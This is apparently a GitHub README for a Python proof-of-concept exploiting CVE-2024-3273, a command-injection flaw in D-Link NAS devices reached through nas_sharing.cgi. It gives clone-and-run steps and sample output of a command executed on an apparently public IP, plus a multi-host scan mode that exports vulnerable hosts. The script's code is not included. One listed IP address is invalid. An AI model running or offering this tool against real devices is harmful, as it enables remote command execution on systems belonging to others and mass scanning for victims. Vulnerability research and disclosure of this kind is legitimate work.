This repository contains a Proof of Concept (PoC) for CVE-2024-3273, a security vulnerability discovered in D-Link NAS devices. The vulnerability allows attackers to execute arbitrary commands on vulnerable devices.
CVE-2024-3273 is a vulnerability in D-Link NAS devices that allows remote attackers to execute arbitrary commands via a crafted HTTP request to the cgi-bin/nas_sharing.cgi endpoint.
This PoC demonstrates how the vulnerability can be exploited to execute commands on vulnerable D-Link NAS devices.
- Python 3.x
requestslibrary
-
Clone this repository:
git clone https://github.com/adhikara13/CVE-2024-3273.git
-
Navigate to the repository directory:
cd CVE-2024-3273 -
Run the PoC:
python main.py
-
Follow the on-screen instructions to choose the target device:
- Option 1: Single Host (1): Enter details for a single target device, including the host IP address and command to run.
- Option 2: Multiple Hosts (2): Provide a file containing multiple target devices in the format
host:port, and choose whether to export vulnerable hosts tovulnerables.txt.
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 1
Enter the host: 114.32.179.200
Enter the command to run: ls
Response from 114.32.179.200:
box.cgi
codepage_mgr.cgi
download_mgr.cgi
dropbox.cgi
folder_tree.cgi
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
Choose an option (1: Single Host, 2: Multiple Hosts): 2
Enter the file path containing hosts: list.txt
Export vulnerable host to vulnerables.txt? (y/n): y
Connection error for host 87.205.188.21:9290.
Connection error for host 186.212.112.141:8081.
Host 124.120.263.149:8032 is vulnerable.
This PoC is for educational and research purposes only. Use it responsibly and only on devices you are authorized to test.
Contributions are welcome! If you find any issues or improvements, feel free to open an issue or create a pull request.